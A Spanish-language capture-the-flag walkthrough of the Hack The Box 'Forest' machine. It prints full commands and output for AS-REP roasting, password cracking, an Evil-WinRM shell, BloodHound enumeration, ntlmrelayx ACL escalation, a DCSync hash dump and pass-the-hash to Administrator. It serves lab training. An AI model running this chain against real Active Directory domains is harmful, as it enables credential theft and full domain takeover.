/root/github/enum4linux/enum4linux.pl line 614. ======================================================================= | Users on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 710. [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 742. ============================================= | Getting printer info for 10.10.10.161 | ============================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 995. Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Sun Jan 12 11:01:56 2020 |
Como se esperaba, la utilidad Enum4linux devolvió bastante información. Encontramos varios usuarios que pueden ser útiles como pueden ser sebastien, lucinda, andy, mark, santi y la cuenta de servicio llamada svc-alfresco.
Además, descubrimos que la política de dominio está configurada de una forma muy flexible, en la cual no exige el uso de una contraseña compleja, lo que puede sugerir que descifrar la misma puede ser relativamente sencillo. Encontramos también que el servidor dispone de una instancia de Microsoft Exchange, lo que también puede resultarnos muy útil.
Utilizaremos ahora la herramienta GetNPUsers de impacket para ver si podemos obtener los usuarios que tienen dicha propiedad o, que no requieren del conjunto de autenticación previo de Kerberos (UF_DONT_REQUIRE_PREAUTH).
Comprobamos entonces con los nombres de usuario obtenidos en el paso anterior y descubrimos algo interesante con el usuario de servicio svc-alfresco, el cual reveló su TGT (Ticket-Granting-Ticket).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
# GetNPUsers.py htb.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161 Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$svc-alfresco@HTB.LOCAL:c71c1e6a12efa32f84f890f0819a87ac$a1d9a1396bb9b9f745682031e2b0bc05fc8cc45206c3433a65e146ee3a6b2e189bf5e566ccf251ad99c39fde4adc630ddb5b5d5f58429ac9c300474f7132c8b103c5ba4f375699062b4a2faa7fa98049cd89f87de29d312ac7eda724bedc58665a8cc1a5fa6b8a2ab82646d0f75ca4b939a6390ebe4ac93515bd76f0132e1c638cf3b8b0c32bc4bffc2f85fcf5b4f4c3e0860ad4dfffa738831a32b10a6b6cd1f10ae6b15fcbe34ea38b454045c63a5d7c32060dd8ad806db4b82528963b32d352694784410dbc735a2b938bebdea078ba9025bf9b23da7cc728b5e0bed7b8d6f98873873d00 [-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set [-] invalid principal syntax |
Y obtenemos un hash para la cuenta de servicio de svc-alfresco. Así que utilizaremos John The Ripper para intentar descifrar la misma, aunque también podríamos utilizar hashcat.
1 2 3 4 5 6 7 8 9 |
# john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status s3rvice ($krb5asrep$23$svc-alfresco@HTB) 1g 0:00:00:10 DONE (2020-01-12 19:39) 0.09606g/s 392484p/s 392484c/s 392484C/s s401447401447401447..s3r2s1 Use the "--show" option to display all of the cracked passwords reliably Session completed |
Y ya tenemos que la contraseña del usuario svc-alfresco es “s3rvice”.
Obteniendo la flag de user
Ahora que ya disponemos de unas credenciales de acceso vamos a intentar obtener una shell con la que acceder a la máquina. Utilizaremos una herramienta de explotación de WinRM llamada Evil-WinRM Shell que nos permitirá obtener una shell de acceso si disponemos de las credenciales correctas. Vamos a probar entonces si los datos obtenidos nos permiten lograr esto y conseguir la flag del usuario.
1 2 3 4 5 6 7 |
# ruby /root/github/evil-winrm/evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice -P 5985 Evil-WinRM shell v2.0 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> |
Y ya tenemos nuestra shell de acceso, comprobamos si podemos obtener la flag de usuario y bingo, ya la tenemos.
1 2 3 4 5 6 7 8 9 10 11 12 |
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls Directory: C:\Users\svc-alfresco\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 9/23/2019 2:16 PM 32 user.txt *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> |
Escalado de privilegios
Ahora que ya disponemos de un acceso y hemos conseguido la flag de usuario, el siguiente paso será conseguir escalar privilegios hasta disponer de acceso como Administrador del sistema.
Para realizar este escalado podemos utilizar una herramienta llamada SharpHound.ps1 que podremos utilzar para identificar una posible ruta hacia el administrador del dominio.
Para ello disponemos de dos opciones, cargar el script en la instancia de Forest o realizar la ejecución automática mediante el script bloodhound-python. Vamos a explicar ambas opciones.
Opción 1: Carga del script en la instancia de Forest
Una vez descargado el script de SharpHound, lo subiremos a la instancia a través del acceso obtenido del usuario svc-alfresco
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> upload /root/github/BloodHound/Ingestors/SharpHound.ps1 C:\Temp\SharpHound.ps1 Info: Uploading /root/github/BloodHound/Ingestors/SharpHound.ps1 to C:\Temp\SharpHound.ps1 Data: 1226060 bytes of 1226060 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cd C:\Temp *Evil-WinRM* PS C:\Temp> ls Directory: C:\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 1/12/2020 11:57 AM 919546 SharpHound.ps1 *Evil-WinRM* PS C:\Temp> |
Una vez subido el archivo SharpHound.ps1, lo importamos a la sesión de PowerShell para poder ejecutarlo.
1 2 |
*Evil-WinRM* PS C:\Temp> Import-module ./SharpHound.ps1 *Evil-WinRM* PS C:\Temp> Invoke-BloodHound -CollectionMethod All |
Y nos generará un fichero dentro del mismo directorio
Tan pronto como ejecuté este comando, tenía un archivo zip dentro del mismo directorio que deberemos de descargar para importar posteriormente en nuestra herramienta BloodHound.
1 2 3 4 5 6 7 8 9 10 11 12 |
*Evil-WinRM* PS C:\Temp> ls Directory: C:\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 1/12/2020 11:59 AM 12560 20200112115941_BloodHound.zip *Evil-WinRM* PS C:\Temp> |
Y podremos descargarnos dicho fichero con el comando download como vemos a continuación
1 2 3 4 5 6 7 8 |
*Evil-WinRM* PS C:\Temp> download C:\Temp\20200112115941_BloodHound.zip /tmp Info: Downloading C:\Temp\20200112115941_BloodHound.zip to /tmp Data: 12560 bytes of 12560 bytes copied Info: Download successful! *Evil-WinRM* PS C:\Temp> |
Opción 2: Uso de bloodhound-python
Deberemos de tener instalada la herramienta BloodHound previamente en nuestro sistema para llevar a cabo este paso. BloodHound es una aplicación utilizada para visualizar entornos de Active Directory. Puede utilizarse para identificar diferentes rutas de ataque, lo que incluye listas de control de acceso (ACLs), usuarios, grupos, relaciones de confianza y objetos únicos de AD.
Una vez tengamos la herramienta instalada, ejecutamos el siguiente comando para abrirla
1 |
bloodhound |
Y posteriormente lanzamos el script de bloodhound-python para obtener los datos necesarios
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
# bloodhound-python -c All -u svc-alfresco -p s3rvice -d htb.local -ns 10.10.10.161 INFO: Found AD domain: htb.local INFO: Connecting to LDAP server: FOREST.htb.local INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: FOREST.htb.local WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153 WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153 WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153 WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153 WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153 INFO: Found 31 users INFO: Found 72 groups INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: FOREST.htb.local INFO: Querying computer: EXCH01.htb.local INFO: Done in 01M 15S |
Este comando generará un fichero .zip como el que vimos en la opción anterior, en el cual se incluyen varios ficheros .json con la información del dominio.
Importaremos los datos obtenidos desde cualquier de las dos opciones en la aplicación y veremos un esquema del dominio como puede apreciarse en la siguiente captura de pantalla:
BloodHound nos desvela que el usuario forma parte del grupo “Exchange Windows Permissions” y tiene la posibilidad de escribir la acl en todo el dominio de htb.local.
Así que inmediatamente vamos a añadirlo al grupo.
1 2 3 4 |
*Evil-WinRM* PS C:\> net group "Exchange Windows Permissions" svc-alfresco /add The command completed successfully. *Evil-WinRM* PS C:\> |
Y ahora que ya tenemos una ruta posible utilizamos la herramienta de impacket ntlmrealyx.py para obtener definitivamente dicho permiso.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
# ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client SMTP loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Servers started, waiting for connections [*] Setting up HTTP Server [*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161 |
En este punto necesitaremos autentificar la conexión para completar la acción, así que vamos al navegador a la dirección http://localhost/privexchange e introducimos los datos de acceso del mismo, svc-alfresco:s3rvice y conseguimos los permisos para dicho usuario
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
# ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client SMTP loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Servers started, waiting for connections [*] Setting up HTTP Server [*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161 [*] HTTPD: Client requested path: /privexchange [*] HTTPD: Client requested path: /privexchange [*] HTTPD: Client requested path: /privexchange [*] Authenticating against ldap://10.10.10.161 as \svc-alfresco SUCCEED [*] Enumerating relayed user's privileges. This may take a while on large domains [*] User privileges found: Create user [*] User privileges found: Modifying domain ACL [*] Querying domain security descriptor [*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain [*] Try using DCSync with secretsdump.py and this user :) [*] Saved restore state to aclpwn-20200112-190714.restore |
Completado este paso y tal y como indica la salida del anterior comando utilizaremos la herramienta secretsdump.py incluida en impacker para obtener los hashes del usuario administrador
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
# secretsdump.py -just-dc-ntlm HTB/svc-alfresco:s3rvice@10.10.10.161 Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f::: htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44::: htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05::: htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a::: htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9::: htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555::: htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5::: htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff::: htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203::: htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355::: htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536::: htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc::: htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3::: htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668::: htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b::: htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7::: htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072::: FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:9740adcc201cec79f84bf45d008cf123::: EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1::: [*] Cleaning up... |
Y como podemos observar tenemos los hash del usuario Administrator.
Obteniendo flag de root
Ahora que disponemos del hash del usuario Administrator vamos a utilizar la herramienta wmiexec.py para intentar autenticarnos contra el mismo con los hashes obtenidos y conseguir una shell con este usuario.
1 2 3 4 5 6 7 8 |
# wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 Administrator@10.10.10.161 Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami htb\administrator |
Lo tenemos, nos vamos a la carpeta de escritorio del usuario y tenemos la flag de root
1 2 3 4 5 6 7 8 9 10 11 12 |
C:\Users\Administrator>cd Desktop C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is E8B0-D68E Directory of C:\Users\Administrator\Desktop 09/23/2019 01:15 PM <DIR> . 09/23/2019 01:15 PM <DIR> .. 09/23/2019 01:15 PM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 29,229,051,904 bytes free |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.